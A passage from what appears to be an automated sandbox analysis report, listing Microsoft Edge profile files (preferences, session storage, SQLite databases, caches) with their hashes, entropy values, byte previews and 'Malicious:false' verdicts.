                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                                                                                                                            MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                                                                                                                            SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                                                                                                                            SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                                                                                                                            SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9767
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.115830386981659
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:stKkdwCsRxPaFvrE9klzws8JbV+FZBQAWUuPSYJ:stKisRxPCDnsbGvQI8
                                                                                                                                                                                                                                                                                                                            MD5:C81ABF84F706C820FCD4AEE149A2B343
                                                                                                                                                                                                                                                                                                                            SHA1:276886C46577805979D8C56994CEB48A900ED5BA
                                                                                                                                                                                                                                                                                                                            SHA-256:8A930B277D9EC34E882CDF04A5219C99951CFE85F5B618CCB7E3372A60FCB391
                                                                                                                                                                                                                                                                                                                            SHA-512:5F14830AA6D273180A779DBE9E36D593802A0881EE1886DAEEA220A4090122906B358F899E8E62B174F33F2314B2043ADFE82C3B092BC2BD7731C0F598E706DB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380536355952736","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3b056.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9767
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.115830386981659
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:stKkdwCsRxPaFvrE9klzws8JbV+FZBQAWUuPSYJ:stKisRxPCDnsbGvQI8
                                                                                                                                                                                                                                                                                                                            MD5:C81ABF84F706C820FCD4AEE149A2B343
                                                                                                                                                                                                                                                                                                                            SHA1:276886C46577805979D8C56994CEB48A900ED5BA
                                                                                                                                                                                                                                                                                                                            SHA-256:8A930B277D9EC34E882CDF04A5219C99951CFE85F5B618CCB7E3372A60FCB391
                                                                                                                                                                                                                                                                                                                            SHA-512:5F14830AA6D273180A779DBE9E36D593802A0881EE1886DAEEA220A4090122906B358F899E8E62B174F33F2314B2043ADFE82C3B092BC2BD7731C0F598E706DB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380536355952736","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.566919002467983
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:nTffQHWjvW5wFZf4XS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPmWIY1w0rwXJpFtuc:n7YH+vWaFZf2Su1jajsWt1tT
                                                                                                                                                                                                                                                                                                                            MD5:ED02A1871812F1497C6C6F565964D481
                                                                                                                                                                                                                                                                                                                            SHA1:CFE4CD7190FBF2DA09DFEA9102802EC8672C6866
                                                                                                                                                                                                                                                                                                                            SHA-256:794FC618C5A7288315A5CD7601825846CB1C52790686F97A674D1F7647336BE4
                                                                                                                                                                                                                                                                                                                            SHA-512:BD29C1ED13BD9408115F318D7592DE8A69034AF4FDCAD660EE0214EFC6254F4F27202CBA479F6CC5E42BEC3D215E98CB00401823C5C84CC1619C315B9D9E4515
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3b036.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.566919002467983
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:nTffQHWjvW5wFZf4XS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPmWIY1w0rwXJpFtuc:n7YH+vWaFZf2Su1jajsWt1tT
                                                                                                                                                                                                                                                                                                                            MD5:ED02A1871812F1497C6C6F565964D481
                                                                                                                                                                                                                                                                                                                            SHA1:CFE4CD7190FBF2DA09DFEA9102802EC8672C6866
                                                                                                                                                                                                                                                                                                                            SHA-256:794FC618C5A7288315A5CD7601825846CB1C52790686F97A674D1F7647336BE4
                                                                                                                                                                                                                                                                                                                            SHA-512:BD29C1ED13BD9408115F318D7592DE8A69034AF4FDCAD660EE0214EFC6254F4F27202CBA479F6CC5E42BEC3D215E98CB00401823C5C84CC1619C315B9D9E4515
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):6354
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.3819566589661076
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:IJDpQ0Vy1a0VLq9Xp+9KiDD7Ll9iSr/thvxW:eDpQJq9Xp+YuLl9iSr1Zx
                                                                                                                                                                                                                                                                                                                            MD5:4BA2F16CE0388FFCB2CE86A9AFB8E2FE
                                                                                                                                                                                                                                                                                                                            SHA1:784C0C15C79839E1071E5167C8616B253CDD62A8
                                                                                                                                                                                                                                                                                                                            SHA-256:811A25688B8CCDC4895DCC8C3D3798CA6A339B64431D418060A6C091074B78D8
                                                                                                                                                                                                                                                                                                                            SHA-512:6367063B4065626C44E5EA013726B5B315B073959221709D907D47CBEA766D135E881A12027DEF04C5679E5E5A800CF00BB3D6D2B7C9451B23FC94F44070C086
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............P...b................next-map-id.1.Cnamespace-9e9e2fbf_fe50_472a_9f07_25eb1c16a1d4-https://ntp.msn.com/.0.<..z................map-0-shd_sweeper..{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.s.h.b.t.n.t.r.t.f.a.c.,.a.d.s.-.m.g.-.c.b.4.2.-.c.t.r.l.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.2.b.,.p.r.g.-.1.s.w.-.r.p.d.l.a.u.n.c.h.-.5.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.r.o.u.t.e.a.u.t.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.u.s.e.c.m.,.b.t.i.e.-.a.d.-.d.p.r.-.m.i.n.1.5.,.p.r.g.-.a.d.-.d.p.r.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.1.s.w.-.s.a.-.m.g.1.1.,.p.r.g.-.w.p.o.-.p.n.p.c.,.1.s.-.w.p.o.-.d.m.s.d.p.r.2.-.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.095427749956501
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHBAL+q2PN723oH+TcwtrQMxIFUttBM1ZmwDWuVlLVkwON723oH+TcwtrQMFLJ:7HvVaYebCFUtE1/6gz5OaYebtJ
                                                                                                                                                                                                                                                                                                                            MD5:52AF778453BCC1A10C4853BE0C8E700F
                                                                                                                                                                                                                                                                                                                            SHA1:BD4667599F33357BFDA5D6D5668A84F7C691F54E
                                                                                                                                                                                                                                                                                                                            SHA-256:6117490614122694ADC2EF029A64C33E80E48C460F54C3CF0D39E68F34BCDF61
                                                                                                                                                                                                                                                                                                                            SHA-512:1178B3E1EE7800ACAA3F8EF48BEE9C17E65F5F570C6AFE15865995D6BBF012D9885C2C25209533500424A4525C4262D4BCDCC657A75366A4C987473302D7AA56
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.256 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/05-02:39:16.258 1e58 Recovering log #3.2025/01/05-02:39:16.260 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.095427749956501
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHBAL+q2PN723oH+TcwtrQMxIFUttBM1ZmwDWuVlLVkwON723oH+TcwtrQMFLJ:7HvVaYebCFUtE1/6gz5OaYebtJ
                                                                                                                                                                                                                                                                                                                            MD5:52AF778453BCC1A10C4853BE0C8E700F
                                                                                                                                                                                                                                                                                                                            SHA1:BD4667599F33357BFDA5D6D5668A84F7C691F54E
                                                                                                                                                                                                                                                                                                                            SHA-256:6117490614122694ADC2EF029A64C33E80E48C460F54C3CF0D39E68F34BCDF61
                                                                                                                                                                                                                                                                                                                            SHA-512:1178B3E1EE7800ACAA3F8EF48BEE9C17E65F5F570C6AFE15865995D6BBF012D9885C2C25209533500424A4525C4262D4BCDCC657A75366A4C987473302D7AA56
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.256 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/05-02:39:16.258 1e58 Recovering log #3.2025/01/05-02:39:16.260 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380536357817755

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.849938613140327
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:38tSL1dtNzTca/hoPwpsAF4unx69tLp3X2amEtG1Chq+bKJQKkOAM4t237:3q6ttTca6PwzFKXLp2FEkChl26HOpKC7
                                                                                                                                                                                                                                                                                                                            MD5:952DF25AD7BE380FB9E6C13BCA60BB21
                                                                                                                                                                                                                                                                                                                            SHA1:8A76334FD470D343DC83B1C09562BA84712A065D
                                                                                                                                                                                                                                                                                                                            SHA-256:97DA24247ADAB3D66F3CC044D410DDBB698763992D812D36A4FC33D1EFC585CA
                                                                                                                                                                                                                                                                                                                            SHA-512:D5842C5AB0A274C288EDCD18F2BD479BC71EA5F1D917625CF359C0DB7B555253483D0E7D6AA223EA4368B199CF7D8CAAD460F58C3CFBFC23624C5868D4F3CC0C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SNSS................................"........................................................!.............................................1..,.......$...9e9e2fbf_fe50_472a_9f07_25eb1c16a1d4.....................................5..0.......&...{46F3A197-DB49-410A-81B3-94975C835573}..............................................edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......gfM..*..hfM..*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... .......................................................P...$...2.2.6.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                            MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                            SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                            SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                            SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.121519279474945
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfiPt+q2PN723oH+Tcwt7Uh2ghZIFUttfiJUHZZmwDfiJUHNVkwON723oH+Tcz:7/3vVaYebIhHh2FUt9J/zD5OaYebIhHd
                                                                                                                                                                                                                                                                                                                            MD5:EE9AD12DA31C6F107D19DB424EB45573
                                                                                                                                                                                                                                                                                                                            SHA1:41E75A033E4BE01ABA2E9DD4C080E09FB95DD56F
                                                                                                                                                                                                                                                                                                                            SHA-256:24099A74E1B485E9BCB7F896233436F36A738655A38B17E769A696BF79A5C92F
                                                                                                                                                                                                                                                                                                                            SHA-512:AB16223C30E2F75DE60255AABE7BABE6418641B62B958FD78DBB0208D67A06DF8E60DD624B66953F864C607A78A8C0FC614A88D97E832E99F51FB70414AB58E3
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.360 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/05-02:39:15.361 1cf8 Recovering log #3.2025/01/05-02:39:15.361 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.121519279474945
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfiPt+q2PN723oH+Tcwt7Uh2ghZIFUttfiJUHZZmwDfiJUHNVkwON723oH+Tcz:7/3vVaYebIhHh2FUt9J/zD5OaYebIhHd
                                                                                                                                                                                                                                                                                                                            MD5:EE9AD12DA31C6F107D19DB424EB45573
                                                                                                                                                                                                                                                                                                                            SHA1:41E75A033E4BE01ABA2E9DD4C080E09FB95DD56F
                                                                                                                                                                                                                                                                                                                            SHA-256:24099A74E1B485E9BCB7F896233436F36A738655A38B17E769A696BF79A5C92F
                                                                                                                                                                                                                                                                                                                            SHA-512:AB16223C30E2F75DE60255AABE7BABE6418641B62B958FD78DBB0208D67A06DF8E60DD624B66953F864C607A78A8C0FC614A88D97E832E99F51FB70414AB58E3
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.360 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/05-02:39:15.361 1cf8 Recovering log #3.2025/01/05-02:39:15.361 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEXlfVj:/M/xT02zUl
                                                                                                                                                                                                                                                                                                                            MD5:66FBC171FFCBADD8B9FFB398A25EE06C
                                                                                                                                                                                                                                                                                                                            SHA1:B8CA6E537EE240D400CF7F389C4BC4C02A90803C
                                                                                                                                                                                                                                                                                                                            SHA-256:7BCAA88E6C212C4C88C1F64D822EC45859F1C53F5B59104F11813C5312986FBC
                                                                                                                                                                                                                                                                                                                            SHA-512:2D54698E820A229B0405F320CF37BCF00ECC0637BE7857AB102B9E6D42FE8B8D34336F5FB52FF4C05866C1AE057D0D1FEBC624CFFF76346F6E644BF4E6BC5537
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                            Malicious:false
